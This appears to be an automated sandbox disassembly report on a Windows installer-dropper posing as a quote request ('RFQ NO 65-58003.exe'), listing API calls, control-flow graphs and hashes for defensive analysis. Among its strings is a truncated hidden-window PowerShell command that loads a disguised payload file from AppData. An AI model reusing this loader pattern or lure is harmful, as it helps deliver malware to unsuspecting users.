                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000020), ref: 00403531
                                                                • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                                • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
                                                              • DeleteFileW.KERNELBASE(1033), ref: 004036D1
                                                                • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                              • ExitProcess.KERNEL32(?), ref: 00403797
                                                              • CoUninitialize.COMBASE(?), ref: 0040379C
                                                              • ExitProcess.KERNEL32 ref: 004037BD
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037D0
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037DF
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037EA
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000,?), ref: 004037F6
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas,?), ref: 0040386C
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ NO 65-58003.exe,00420EE8,00000001), ref: 00403880
                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
                                                              • ExitProcess.KERNEL32 ref: 00403963
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$C:\Users\user\AppData\Roaming\afdragsordning\Overrack2$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ NO 65-58003.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas$~nsu
                                                              • API String ID: 354199918-1437079879
                                                              • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                              • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
                                                              • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                              • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E

                                                              Control-flow Graph

                                                              control_flow_graph 131 4054b0-4054cb 132 4054d1-405598 GetDlgItem * 3 call 40430b call 404c0e GetClientRect GetSystemMetrics SendMessageW * 2 131->132 133 40565a-405661 131->133 155 4055b6-4055b9 132->155 156 40559a-4055b4 SendMessageW * 2 132->156 135 405663-405685 GetDlgItem CreateThread CloseHandle 133->135 136 40568b-405698 133->136 135->136 138 4056b6-4056c0 136->138 139 40569a-4056a0 136->139 140 4056c2-4056c8 138->140 141 405716-40571a 138->141 143 4056a2-4056b1 ShowWindow * 2 call 40430b 139->143 144 4056db-4056e4 call 40433d 139->144 145 4056f0-405700 ShowWindow 140->145 146 4056ca-4056d6 call 4042af 140->146 141->144 149 40571c-405722 141->149 143->138 152 4056e9-4056ed 144->152 153 405710-405711 call 4042af 145->153 154 405702-40570b call 405371 145->154 146->144 149->144 157 405724-405737 SendMessageW 149->157 153->141 154->153 160 4055c9-4055e0 call 4042d6 155->160 161 4055bb-4055c7 SendMessageW 155->161 156->155 162 405839-40583b 157->162 163 40573d-405768 CreatePopupMenu call 406234 AppendMenuW 157->163 170 4055e2-4055f6 ShowWindow 160->170 171 405616-405637 GetDlgItem SendMessageW 160->171 161->160 162->152 168 40576a-40577a GetWindowRect 163->168 169 40577d-405792 TrackPopupMenu 163->169 168->169 169->162 172 405798-4057af 169->172 173 405605 170->173 174 4055f8-405603 ShowWindow 170->174 171->162 175 40563d-405655 SendMessageW * 2 171->175 176 4057b4-4057cf SendMessageW 172->176 177 40560b-405611 call 40430b 173->177 174->177 175->162 176->176 178 4057d1-4057f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 176->178 177->171 180 4057f6-40581d SendMessageW 178->180 180->180 181 40581f-405833 GlobalUnlock SetClipboardData CloseClipboard 180->181 181->162
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 0040550E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040551D
                                                              • GetClientRect.USER32(?,?), ref: 0040555A
                                                              • GetSystemMetrics.USER32(00000002), ref: 00405561
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
                                                              • ShowWindow.USER32(?,00000008), ref: 004055FD
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040561E
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040552C
                                                                • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405670
                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005444,00000000), ref: 0040567E
                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405685
                                                              • ShowWindow.USER32(00000000), ref: 004056A9
                                                              • ShowWindow.USER32(?,00000008), ref: 004056AE
                                                              • ShowWindow.USER32(00000008), ref: 004056F8
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
                                                              • CreatePopupMenu.USER32 ref: 0040573D
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
                                                              • GetWindowRect.USER32(?,?), ref: 00405771
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
                                                              • OpenClipboard.USER32(00000000), ref: 004057D2
                                                              • EmptyClipboard.USER32 ref: 004057D8
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
                                                              • GlobalLock.KERNEL32(00000000), ref: 004057EE
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405822
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
                                                              • CloseClipboard.USER32 ref: 00405833
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: (7B${
                                                              • API String ID: 590372296-525222780
                                                              • Opcode ID: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                              • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
                                                              • Opcode Fuzzy Hash: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                              • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68

                                                              Control-flow Graph
                                                              control_flow_graph 492 405a03-405a29 call 405cce 495 405a42-405a49 492->495 496 405a2b-405a3d DeleteFileW 492->496 498 405a4b-405a4d 495->498 499 405a5c-405a6c call 406212 495->499 497 405bbf-405bc3 496->497 500 405a53-405a56 498->500 501 405b6d-405b72 498->501 507 405a7b-405a7c call 405c12 499->507 508 405a6e-405a79 lstrcatW 499->508 500->499 500->501 501->497 503 405b74-405b77 501->503 505 405b81-405b89 call 406555 503->505 506 405b79-405b7f 503->506 505->497 516 405b8b-405b9f call 405bc6 call 4059bb 505->516 506->497 511 405a81-405a85 507->511 508->511 512 405a91-405a97 lstrcatW 511->512 513 405a87-405a8f 511->513 515 405a9c-405ab8 lstrlenW FindFirstFileW 512->515 513->512 513->515 517 405b62-405b66 515->517 518 405abe-405ac6 515->518 532 405ba1-405ba4 516->532 533 405bb7-405bba call 405371 516->533 517->501 523 405b68 517->523 520 405ae6-405afa call 406212 518->520 521 405ac8-405ad0 518->521 534 405b11-405b1c call 4059bb 520->534 535 405afc-405b04 520->535 524 405ad2-405ada 521->524 525 405b45-405b55 FindNextFileW 521->525 523->501 524->520 528 405adc-405ae4 524->528 525->518 531 405b5b-405b5c FindClose 525->531 528->520 528->525 531->517 532->506 538 405ba6-405bb5 call 405371 call 4060b3 532->538 533->497 543 405b3d-405b40 call 405371 534->543 544 405b1e-405b21 534->544 535->525 539 405b06-405b0f call 405a03 535->539 538->497 539->525 543->525 547 405b23-405b33 call 405371 call 4060b3 544->547 548 405b35-405b3b 544->548 547->525 548->525
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,76233420,76232EE0,00000000), ref: 00405A2C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405A74
                                                              • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405A97
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405A9D
                                                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405AAD
                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
                                                              • FindClose.KERNELBASE(00000000), ref: 00405B5C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*$\*.*
                                                              • API String ID: 2035342205-2402350367
                                                              • Opcode ID: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                              • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
                                                              • Opcode Fuzzy Hash: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                              • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                              • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
                                                              • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                              • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0), ref: 00406560
                                                              • FindClose.KERNEL32(00000000), ref: 0040656C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: xgB
                                                              • API String ID: 2295610775-399326502
                                                              • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                              • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
                                                              • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                              • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040288D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
                                                              • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
                                                              • Opcode Fuzzy Hash: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
                                                              • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29

                                                              Control-flow Graph
                                                              control_flow_graph 182 403dfe-403e10 183 403f51-403f60 182->183 184 403e16-403e1c 182->184 186 403f62-403faa GetDlgItem * 2 call 4042d6 SetClassLongW call 40140b 183->186 187 403faf-403fc4 183->187 184->183 185 403e22-403e2b 184->185 188 403e40-403e43 185->188 189 403e2d-403e3a SetWindowPos 185->189 186->187 191 404004-404009 call 404322 187->191 192 403fc6-403fc9 187->192 194 403e45-403e57 ShowWindow 188->194 195 403e5d-403e63 188->195 189->188 201 40400e-404029 191->201 197 403fcb-403fd6 call 401389 192->197 198 403ffc-403ffe 192->198 194->195 202 403e65-403e7a DestroyWindow 195->202 203 403e7f-403e82 195->203 197->198 213 403fd8-403ff7 SendMessageW 197->213 198->191 200 4042a3 198->200 208 4042a5-4042ac 200->208 206 404032-404038 201->206 207 40402b-40402d call 40140b 201->207 209 404280-404286 202->209 211 403e84-403e90 SetWindowLongW 203->211 212 403e95-403e9b 203->212 216 404261-40427a DestroyWindow KiUserCallbackDispatcher 206->216 217 40403e-404049 206->217 207->206 209->200 214 404288-40428e 209->214 211->208 218 403ea1-403eb2 GetDlgItem 212->218 219 403f3e-403f4c call 40433d 212->219 213->208 214->200 223 404290-404299 ShowWindow 214->223 216->209 217->216 224 40404f-40409c call 406234 call 4042d6 * 3 GetDlgItem 217->224 220 403ed1-403ed4 218->220 221 403eb4-403ecb SendMessageW IsWindowEnabled 218->221 219->208 225 403ed6-403ed7 220->225 226 403ed9-403edc 220->226 221->200 221->220 223->200 252 4040a6-4040e2 ShowWindow KiUserCallbackDispatcher call 4042f8 EnableWindow 224->252 253 40409e-4040a3 224->253 229 403f07-403f0c call 4042af 225->229 230 403eea-403eef 226->230 231 403ede-403ee4 226->231 229->219 233 403f25-403f38 SendMessageW 230->233 235 403ef1-403ef7 230->235 231->233 234 403ee6-403ee8 231->234 233->219 234->229 238 403ef9-403eff call 40140b 235->238 239 403f0e-403f17 call 40140b 235->239 250 403f05 238->250 239->219 248 403f19-403f23 239->248 248->250 250->229 256 4040e4-4040e5 252->256 257 4040e7 252->257 253->252 258 4040e9-404117 GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 404119-40412a SendMessageW 258->259 260 40412c 258->260 261 404132-404170 call 40430b call 406212 lstrlenW call 406234 SetWindowTextW call 401389 259->261 260->261 261->201 270 404176-404178 261->270 270->201 271 40417e-404182 270->271 272 4041a1-4041b5 DestroyWindow 271->272 273 404184-40418a 271->273 272->209 275 4041bb-4041e8 CreateDialogParamW 272->275 273->200 274 404190-404196 273->274 274->201 276 40419c 274->276 275->209 277 4041ee-404245 call 4042d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->200 277->200 282 404247-40425a ShowWindow call 404322 277->282 284 40425f 282->284 284->209
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
                                                              • ShowWindow.USER32(?), ref: 00403E57
                                                              • DestroyWindow.USER32 ref: 00403E6B
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
                                                              • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403EC3
                                                              • GetDlgItem.USER32(?,00000001), ref: 00403F71
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403F7B
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
                                                              • GetDlgItem.USER32(?,00000003), ref: 0040408C
                                                              • ShowWindow.USER32(00000000,?), ref: 004040AD
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
                                                              • EnableWindow.USER32(?,?), ref: 004040DA
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F0
                                                              • EnableMenuItem.USER32(00000000), ref: 004040F7
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
                                                              • SetWindowTextW.USER32(?,00423728), ref: 0040415F
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
